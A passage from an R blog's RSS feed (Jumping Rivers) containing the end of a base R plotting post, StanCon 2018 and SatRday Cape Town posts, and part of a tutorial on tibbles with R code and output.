&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;text&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3.7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;virginica&amp;#34;&lt;/span&gt;, col &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rgb&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;85&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;130&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;169&lt;/span&gt;, maxColorValue &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;255&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we have the plot title&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;title&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The infamous IRIS data&amp;#34;&lt;/span&gt;, adj &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cex.main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.8&lt;/span&gt;, font.main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, col.main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Putting it all together gives&lt;/p&gt;
&lt;img class="image-center" src="plot2-1.svg" style="width:500px; class:image-center"&gt;
&lt;p&gt;A much better job.&lt;/p&gt;
&lt;h2 id="why-not-use-ggplot2-or-something-else"&gt;Why not use ggplot2 (or something else)?&lt;/h2&gt;
&lt;p&gt;This seems like a lot of work to create a simple scatter plot. Why not use X, Y, or {ggplot2}? We even have a course on &lt;a href="https://www.jumpingrivers.com/training/course/advanced-graphics-ggplot2-r/"&gt;{ggplot2}&lt;/a&gt; so we’re not biased. The purpose of this article isn’t to get into a religious visualisation war on base R vs … However if you want such a war, have a look at the blog posts by &lt;a href="http://flowingdata.com/2016/03/22/comparing-ggplot2-and-r-base-graphics/" rel="external"&gt;Flowing Data&lt;/a&gt;, &lt;a href="https://simplystatistics.org/2016/02/11/why-i-dont-use-ggplot2/" rel="external"&gt;Jeff Leek&lt;/a&gt; and &lt;a href="http://varianceexplained.org/r/why-I-use-ggplot2/" rel="external"&gt;David Robinson&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;One point that is worth making is that since we are only using base R functions, our plot will almost certainly be reproducible for all future versions of R! Not something to quickly dismiss.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/styling-base-r-graphics/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>StanCon 2018 Highlights</title><link>https://www.jumpingrivers.com/blog/stancon-2018-highlights/</link><pubDate>Wed, 24 Jan 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/stancon-2018-highlights/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/stancon-2018-highlights/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/stancon-2018-highlights/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This year we had the privilege of sponsoring &lt;a href="http://mc-stan.org/events/stancon2018/" rel="external"&gt;StanCon&lt;/a&gt;. Unfortunately, we weren’t able to actually attend the conference. Rather than let our ticket go to waste, we ran a small &lt;a href="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/"&gt;competition&lt;/a&gt;, which &lt;a href="http://home.ignacio.website/" rel="external"&gt;Ignacio Martinez&lt;/a&gt; won with his very cool (but in alpha stage) &lt;a href="https://github.com/ignacio82/IMposterior" rel="external"&gt;R package&lt;/a&gt;.&lt;/p&gt;
&lt;img class="image-center" src="stancon_comp.gif" style="width:400px; class:image-center"&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-stancon-2018-highlights"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="highlights-from-stancon-2018"&gt;Highlights from StanCon 2018&lt;/h2&gt;
&lt;p&gt;During my econ PhD I learned a lot about frequentist statistics. Alas, my training of Bayesian statistics was limited. Three years ago, I joined &lt;a href="https://twitter.com/MathPolResearch" rel="external"&gt;@MathPolResearch&lt;/a&gt; and started delving into this whole new world. Two weeks ago, thanks to &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt;, I was able to attend &lt;a href="http://mc-stan.org/events/stancon2018/" rel="external"&gt;StanCon&lt;/a&gt;. This was an amazing experience, which allowed me to meet some great people and learn a lot from them. These are my highlights from the conference:&lt;/p&gt;
&lt;p&gt;You’d better have a very good reason to not use hierarchical models. &lt;a href="http://discourse.mc-stan.org/u/bgoodri/summary" rel="external"&gt;Ben Goodrich&lt;/a&gt;’s tutorial on advanced hierarchical models was great. Most social science data has a natural hierarchy and modeling it using Stan is easy! Slides for this three day tutorial are available here: [&lt;a href="http://mc-stan.org/events/stancon2018/AHM/AHM1.pdf" rel="external"&gt;day 1&lt;/a&gt;, &lt;a href="http://mc-stan.org/events/stancon2018/AHM/AHM2.pdf" rel="external"&gt;day 2&lt;/a&gt;, &lt;a href="http://mc-stan.org/events/stancon2018/AHM/AHM3.pdf" rel="external"&gt;day 3&lt;/a&gt;].&lt;/p&gt;
&lt;p&gt;Everyone should take his or her model to the &lt;a href="https://cran.r-project.org/web/packages/loo/" rel="external"&gt;loo&lt;/a&gt;. &lt;a href="https://twitter.com/avehtari" rel="external"&gt;@avehtari&lt;/a&gt;’s excellent tutorial covered cross-validation, reference predictive and projection predictive approaches for model assessment, selection and inference after model selection. This tutorial is &lt;a href="https://github.com/avehtari/modelselection_tutorial" rel="external"&gt;available online&lt;/a&gt;, and everyone using Stan should do it.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://discourse.mc-stan.org/u/bob_carpenter/summary" rel="external"&gt;Bob Carpenter&lt;/a&gt;‘s tutorial on how to verify fit and diagnose convergence answered many practical and theoretical questions I had. Bob did a great job explaining how the effective sample sizes and potential scale reduction factors (’R hats’) are calculated. He also gives us some practical rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We want R hat to be less than 1.05 and greater than 0.9&lt;/li&gt;
&lt;li&gt;R hat equal to 1 does not guarantee convergence&lt;/li&gt;
&lt;li&gt;An effective sample size between 50 and 100 is enough&lt;/li&gt;
&lt;li&gt;Don’t be afraid to ask questions on the &lt;a href="http://discourse.mc-stan.org/t/how-can-i-solve-bfmi-low-problem/3018/14" rel="external"&gt;Stan forum&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Bayesian Decision Making for Executives and Those who Communicate with Them series by Eric Novik and Jonathan Auerbach had some very good advice:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Before model building, ask: What decisions are you trying to make? What is the cost of the wrong decision? What is the gain from a good decision?&lt;/li&gt;
&lt;li&gt;During model building: Elicit enough information about the problem so that a generative model can be expressed. This is very hard. A lot depends on the industry (e.g., book publishers are very different from pharma companies).&lt;/li&gt;
&lt;li&gt;After the model has been fit: Communicate the results so stakeholders can make a decision. Some things to keep in mind when doing so include:
&lt;ul&gt;
&lt;li&gt;Stakeholders should not care about p-values, Bayes factors or ROC curves (but sometimes do).&lt;/li&gt;
&lt;li&gt;Stakeholders should care about the uncertainty in your estimates, but often they do not.&lt;/li&gt;
&lt;li&gt;Stakeholders should know their loss or utility function, but they often do not.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To sum this up, the Stan developers are an incredibly talented and generous group of people that have created a useful and flexible programing language and a fantastic community around it. I look forward to future StanCons. A few other things that I am looking forward to in the nearer future (and I under&lt;a href="https://www.youtube.com/watch?v=pWow8Qe1snQ" rel="external"&gt;&lt;em&gt;Stan&lt;/em&gt;&lt;/a&gt;d are coming soon…):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A series of Coursera massive open online courses (MOOCs)&lt;/li&gt;
&lt;li&gt;Support for parallel computing with MPI and GPUs&lt;/li&gt;
&lt;li&gt;loo 2.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/stancon-2018-highlights/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRday in South Africa</title><link>https://www.jumpingrivers.com/blog/satrday-in-south-africa/</link><pubDate>Fri, 19 Jan 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrday-in-south-africa/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrday-in-south-africa/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrday-in-south-africa/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; is proud to be sponsoring the upcoming &lt;a href="http://capetown2018.satrdays.org/" rel="external"&gt;SatRday&lt;/a&gt; conference in Cape Town, South Africa on 17th March 2018.&lt;/p&gt;
&lt;img class="image-center" src="satrdays_jr.png" style="width:500px; class:image-center"&gt;
&lt;h2 id="what-is-satrday"&gt;What is SatRday?&lt;/h2&gt;
&lt;p&gt;SatRdays are a collection of free/cheap accessible R conferences organised by members of the R community at various locations across the globe. Each SatRday looks to provide talks and/or workshops by R programmers covering the language and it’s applications and is run as a not-for-profit event. They provide a great place to meet like minded people, be it researchers, data scientists, developers or enthusiasts, to discuss your passion for R programming.&lt;/p&gt;
&lt;h2 id="satrday-in-cape-town"&gt;SatRday in Cape Town&lt;/h2&gt;
&lt;p&gt;This years SatRday in Cape Town has a collection of workshops on the days running up to the conference on the Saturday. For more detailed information concerning speakers, workshop topics and registration head on over to &lt;a href="http://capetown2018.satrdays.org/" rel="external"&gt;http://capetown2018.satrdays.org/&lt;/a&gt; .&lt;/p&gt;
&lt;h2 id="be-in-it-to-win-it"&gt;Be in it to win it&lt;/h2&gt;
&lt;p&gt;In addition to sponsoring the conference this year, Jumping Rivers is also giving you the chance to win a free ticket. To be in with a chance just respond to the tweet below:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://twitter.com/DataWookie/status/953867344790609920" rel="external"&gt;https://twitter.com/DataWookie/status/953867344790609920&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrday-in-south-africa/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The Trouble with Tibbles</title><link>https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/</link><pubDate>Mon, 08 Jan 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/the-trouble-with-tibbles/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Let’s get something straight, there isn’t really any trouble with tibbles. I’m hoping you’ve noticed this is a play on 1967 &lt;a href="https://en.wikipedia.org/wiki/The_Trouble_with_Tribbles" rel="external"&gt;Star Trek episode&lt;/a&gt;, “The Trouble with Tribbles”. I’ve recently got myself a job as a Data Scientist, here, at &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;. Having never come across tibbles until this point, I now find myself using them in nearly every R script I compose. Be that your timeless standard R script, your friendly Shiny app or an analytical Markdown document.&lt;/p&gt;
&lt;h2 id="what-are-tibbles"&gt;What are tibbles?&lt;/h2&gt;
&lt;p&gt;Presumably this is why you came here, right?&lt;/p&gt;
&lt;p&gt;Tibbles are a modern take on data frames, but crucially they are &lt;em&gt;still&lt;/em&gt; data frames. Well, what’s the difference then? There’s a quote I found somewhere on the internet that decribes the difference quite well;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;“keeping what time has proven to be effective, and throwing out what is not”&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Basically, some clever people took the classic &lt;code&gt;data.frame()&lt;/code&gt;, shook it til the ineffective parts fell out, then added some new, more appropriate features.&lt;/p&gt;
&lt;h2 id="precursors"&gt;Precursors&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# The easiest way to get access is to isstall the tibble package.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tibble&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Alternatively, tibbles are a part of the tidyverse and hence&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# installing the whole tidyverse will give you access.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# I am just going to use tibble.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tibble&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-the-trouble-with-tibbles"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="tribblemaking"&gt;Tribblemaking&lt;/h2&gt;
&lt;p&gt;There are three ways to form a tibble. It pretty much acts as your friendly old pal &lt;code&gt;data.frame()&lt;/code&gt; does. Just like standard data frames, we can create tibbles, coerce objects into tibbles and import data sets into &lt;code&gt;R&lt;/code&gt; as a tibble. Below is a table of the traditional &lt;code&gt;data.frame()&lt;/code&gt; commands and their respective {tidyverse} commands.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Formation Type&lt;/th&gt;
&lt;th style="text-align: left"&gt;Data Frame Commands&lt;/th&gt;
&lt;th style="text-align: left"&gt;Tibbles Commands&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;&lt;em&gt;Creation&lt;/em&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;data.frame()&lt;/code&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;data_frame()&lt;/code&gt; &lt;code&gt;tibble()&lt;/code&gt; &lt;code&gt;tribble()&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;&lt;em&gt;Coercion&lt;/em&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;as.data.frame()&lt;/code&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;as_data_frame()&lt;/code&gt; &lt;code&gt;as_tibble()&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;&lt;em&gt;Importing&lt;/em&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;read.*()&lt;/code&gt;&lt;/td&gt;
&lt;td style="text-align: left"&gt;&lt;code&gt;read_delim()&lt;/code&gt; &lt;code&gt;read_csv()&lt;/code&gt; &lt;code&gt;read_csv2()&lt;/code&gt; &lt;code&gt;read_tsv()&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Let’s take a closer look…&lt;/p&gt;
&lt;h4 id="1-creation"&gt;1) Creation.&lt;/h4&gt;
&lt;p&gt;Just as &lt;code&gt;data.frame()&lt;/code&gt; creates data frames,&lt;code&gt;tibble()&lt;/code&gt;, &lt;code&gt;data_frame()&lt;/code&gt; and &lt;code&gt;tribble()&lt;/code&gt; all create tibbles.&lt;/p&gt;
&lt;p&gt;Standard data frame.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## a b
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;A tibble using &lt;code&gt;tibble()&lt;/code&gt; (identical to using &lt;code&gt;data_frame&lt;/code&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 5 x 2
## a b
## &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt;
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;A tibble using &lt;code&gt;tribble()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tribble&lt;/span&gt;( &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;a, &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;b,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;#---|----&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;a&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;b&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 2 x 2
## a b
## &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt;
## 1 1.00 a
## 2 2.00 b
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Notice the odd one out? &lt;code&gt;tribble()&lt;/code&gt; is different. It’s a way of laying out small amounts of data in an easy to read form. I’m not too keen on these, as even writing out that simple 2 x 2 tribble got tedious.&lt;/p&gt;
&lt;h4 id="2-coercion"&gt;2) Coercion.&lt;/h4&gt;
&lt;p&gt;Just as &lt;code&gt;as.data.frame()&lt;/code&gt; coerces objects into data frames, &lt;code&gt;as_data_frame()&lt;/code&gt; and &lt;code&gt;as_tibble()&lt;/code&gt; coerce objects into tibbles.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(a &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;letters&lt;/span&gt;[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_data_frame&lt;/span&gt;(df)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 5 x 2
## a b
## &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt;
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as_tibble&lt;/span&gt;(df)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 5 x 2
## a b
## &amp;lt;int&amp;gt; &amp;lt;fct&amp;gt;
## 1 1 a
## 2 2 b
## 3 3 c
## 4 4 d
## 5 5 e
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;You can coerce more than just data frames, too. Objects such as lists, matrices, vectors and single instances of class are convertible.&lt;/p&gt;
&lt;h4 id="3-importing"&gt;3) Importing.&lt;/h4&gt;
&lt;p&gt;There’s a few options to read in data files within the {tidyverse}, so we’ll just compare &lt;code&gt;read_csv()&lt;/code&gt; and its representative &lt;code&gt;data.frame()&lt;/code&gt; pal, &lt;code&gt;read.csv()&lt;/code&gt;. Let’s take a look at them. I have here an example data set that I’ve created in MS Excel. You can download/look at this data &lt;a href="https://gist.github.com/theoroe3/8bc989b644adc24117bc66f50c292fc8" rel="external"&gt;here&lt;/a&gt;. To get access to this function you’ll need the {readr} package. Again this is part of the {tidyverse} so either will do.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://gist.githubusercontent.com/theoroe3/8bc989b644adc24117bc66f50c292fc8/raw/f677a2ad811a9854c9d174178b0585a87569af60/tibbles_data.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## Parsed with column specification:
## cols(
## `&amp;lt;-` = col_integer(),
## `8` = col_integer(),
## `%` = col_double(),
## name = col_character()
## )
&lt;/code&gt;&lt;/pre&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tib
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## # A tibble: 4 x 4
## `&amp;lt;-` `8` `%` name
## &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt;
## 1 1 2 0.250 t
## 2 2 4 0.250 h
## 3 3 6 0.250 e
## 4 4 8 0.250 o
